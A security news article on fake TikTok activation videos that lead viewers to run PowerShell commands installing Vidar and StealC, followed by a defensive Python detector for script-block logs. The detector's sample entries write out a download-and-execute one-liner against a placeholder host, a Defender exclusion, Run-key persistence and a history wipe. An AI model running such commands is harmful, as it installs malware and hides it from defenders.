Fake Software Activation Videos on TikTok Spread Vidar, StealC Malware

Cybercriminals are using fake software activation videos on TikTok to trick users into running commands that install the Vidar and StealC malware. These malicious videos have been viewed over 500,000 times, increasing the threat's reach via TikTok's algorithm.

The researchers at Trend Micro reported that these videos disguise themselves as legitimate software activation steps for tools like Windows, Office, CapCut, or Spotify. However, when users run the PowerShell commands embedded in these videos, they download and install the Vidar and StealC malware. These malware payloads set up persistence via the registry, add Windows Defender exclusions, and delete traces to avoid detection.

The videos themselves appear to be AI-generated. The researchers found that several TikTok accounts had been deactivated after posting them, and the strong similarities between the videos (visuals and voice-over alike) suggest they were produced with automated tools, which is why they look and sound nearly identical.

One particularly convincing video gained nearly 500,000 views, 20,000+ likes, and 100+ comments, showing high engagement and trust among users. Its narration walks viewers step by step through running a PowerShell command that downloads the malware. The attackers use legitimate services such as Steam and Telegram as Dead Drop Resolvers (DDR): the command-and-control (C&C) details are embedded in public profiles on those platforms, so the malware can look them up without the operator exposing a dedicated server.

Vidar uses direct IP connections, while StealC relies on these dead-drop methods to obscure its infrastructure and maintain persistence while reducing visibility to security tools. This delivery method highlights the need to reassess defense strategies against social media-based malware attacks.
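The behaviours described above (a user-typed download-and-execute command, a Windows Defender exclusion, registry Run-key persistence, and trace deletion) each leave a footprint in PowerShell script-block logging. The following is an added example written for this article, not code or detection content from Trend Micro's report: it runs a handful of behavioural rules over constructed sample log entries and raises the verdict when the download step co-occurs with any of the follow-on behaviours in the same session, since an exclusion or Run key on its own is often legitimate admin activity. The log lines, host names and paths are all placeholders; the rule names are hypothetical.

```python
import re
from typing import Dict, List

# Constructed sample script-block log text (PowerShell Event ID 4104
# ScriptBlockText as a SIEM might forward it). These lines are invented for
# the example; the host name and paths are placeholders.
SAMPLE_SCRIPT_BLOCKS = [
    # ordinary admin activity, should produce no hits
    'Get-ChildItem -Path C:\\Users\\alice\\Documents -Recurse',
    # download-and-run one-liner of the kind the videos tell viewers to paste
    'iex (iwr -UseBasicParsing http://placeholder.invalid/activate.ps1)',
    # Defender exclusion covering the drop directory
    'Add-MpPreference -ExclusionPath "$env:APPDATA\\Updater"',
    # registry Run-key persistence
    'Set-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" '
    '-Name Updater -Value "$env:APPDATA\\Updater\\u.exe"',
    # anti-forensics: wiping the PowerShell command history
    'Remove-Item (Get-PSReadlineOption).HistorySavePath -Force',
]

# Hypothetical rule names mapped to case-insensitive patterns. Each rule
# captures one behaviour from the article; insertion order is the report order.
RULES: Dict[str, "re.Pattern[str]"] = {
    "download_and_execute": re.compile(
        r"\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest|downloadstring|net\.webclient)\b",
        re.I,
    ),
    "defender_exclusion": re.compile(
        r"\badd-mppreference\b.*-exclusion(path|process|extension)\b", re.I
    ),
    "run_key_persistence": re.compile(r"\bcurrentversion\\run(once)?\b", re.I),
    "history_wipe": re.compile(
        r"\b(clear-history|remove-item\b.*(historysavepath|consolehost_history))", re.I
    ),
}

# Behaviours that turn a single download into a high-confidence chain.
FOLLOW_ON = {"defender_exclusion", "run_key_persistence", "history_wipe"}


def scan_script_block(text: str) -> List[str]:
    """Return the names of every rule that matches one script-block entry."""
    return [name for name, pattern in RULES.items() if pattern.search(text)]


def session_verdict(script_blocks: List[str]) -> str:
    """Rate a whole session (one user's sequence of script blocks).

    high   : download-and-execute plus at least one follow-on behaviour
    medium : two or more distinct behaviours without the download step
    low    : a single behaviour (often benign on its own)
    none   : nothing matched
    """
    seen = set()
    for block in script_blocks:
        seen.update(scan_script_block(block))
    if "download_and_execute" in seen and seen & FOLLOW_ON:
        return "high"
    if len(seen) >= 2:
        return "medium"
    if len(seen) == 1:
        return "low"
    return "none"


if __name__ == "__main__":
    for block in SAMPLE_SCRIPT_BLOCKS:
        print(f"{scan_script_block(block) or '-':<40} {block[:60]}")
    print("session verdict:", session_verdict(SAMPLE_SCRIPT_BLOCKS))
```

Script-block logging only sees what passes through PowerShell; if the payload later changes Defender settings or writes the Run key through native APIs rather than cmdlets, those actions surface in Defender's own operational log and in Sysmon registry events instead, so a production rule would correlate across those sources rather than rely on 4104 alone.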

The report concludes that traditional security controls are less effective against attacks that exploit user trust and obscure malicious intent. Security strategies must adopt a more holistic approach that includes social media monitoring, behavioral analysis, and targeted user education to combat these threats.

Conclusion

As the popularity of social media platforms continues to grow, cybercriminals are adapting their tactics to exploit user trust. The spread of fake software activation videos on TikTok using AI-generated content highlights the need for a more comprehensive approach to cybersecurity.
